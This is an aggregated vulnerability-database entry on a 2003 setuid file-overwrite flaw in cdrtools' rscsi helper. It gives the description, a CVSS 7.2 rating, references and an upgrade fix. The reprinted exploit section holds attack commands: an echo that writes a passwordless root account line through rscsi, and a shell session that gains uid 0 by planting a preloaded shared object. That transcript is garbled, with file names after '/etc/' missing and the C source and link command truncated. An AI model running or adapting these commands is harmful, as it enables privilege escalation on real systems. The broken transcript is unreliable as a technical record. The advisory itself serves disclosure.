Published: 2003-08-27 00:00:00
Revised: 2016-10-17 22:36:23

[Original] rscsi in cdrtools 2.01 and earlier allows local users to overwrite arbitrary files and gain root privileges by specifying the target file as a command line argument, which is modified while rscsi is running with privileges.

[CNNVD] cdrtools rscsi file overwrite vulnerability (CNNVD-200308-192)

        rscsi in cdrtools 2.01 and earlier contains a vulnerability. A local user can overwrite arbitrary files and elevate privileges by specifying the target file as a command line argument; the target file is modified while rscsi runs with privileges.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other links and resources
(UNKNOWN)  BUGTRAQ  20030801 SRT2003-08-01-0126 - cdrtools local root exploit

- Vulnerability information

cdrtools rscsi file overwrite vulnerability
High Unknown
2003-08-27 00:00:00 2005-10-20 00:00:00
        rscsi in cdrtools 2.01 and earlier contains a vulnerability. A local user can overwrite arbitrary files and elevate privileges by specifying the target file as a command line argument; the target file is modified while rscsi runs with privileges.

- Advisories and patches


- Vulnerability information (22979)

CDRTools 2.0 RSCSI Debug File Arbitrary Local File Manipulation Vulnerability (EDBID:22979)
linux local
2003-08-01 Verified
0 Secure Network Operations
N/A

It has been reported that the rscsi utility may provide for the modification of ownership and the corruption of arbitrary attacker specified files.

It has been reported that a local attacker may invoke the rscsi utility to corrupt or seize group ownership of an attacker specified file. Because the rscsi utility is installed with setuid 'root' permissions by default, a local attacker may harness this vulnerability to achieve elevated privileges.

$ echo C`echo -e "\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` | /opt/schily/sbin/rscsi /tmp/lala

[kf@vegeta kf]$ ls -al /etc/
ls: /etc/ No such file or directory
[kf@vegeta kf]$ cat > oops.c
int getuid(void)
[kf@vegeta kf]$ gcc -c -o oops.o oops.c
[kf@vegeta kf]$ ld -shared -o oops.o
[kf@vegeta kf]$ ls -al
-rwxrwxr-x 1 kf kf 1714 Jul 30 18:53
[kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/
Garbage command
-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/
[kf@vegeta kf]$ echo /home/kf/ > /etc/
[kf@vegeta kf]$ su
[root@vegeta kf]# rm /etc/
rm: remove regular file `/etc/'? y
[root@vegeta kf]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

- Vulnerability information

cdrtools cdrecord rscsi Arbitrary File Overwrite Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

cdrecord in cdrtools contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The problem is that the rscsi helper binary is installed setuid root. By specifying the target file as a command line argument, a malicious user could overwrite arbitrary files to gain root privileges resulting in a loss of integrity.

- Timeline

2003-08-01 Unknown
2003-08-01 Unknown

- Solution

Upgrade to version 2.01a18 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author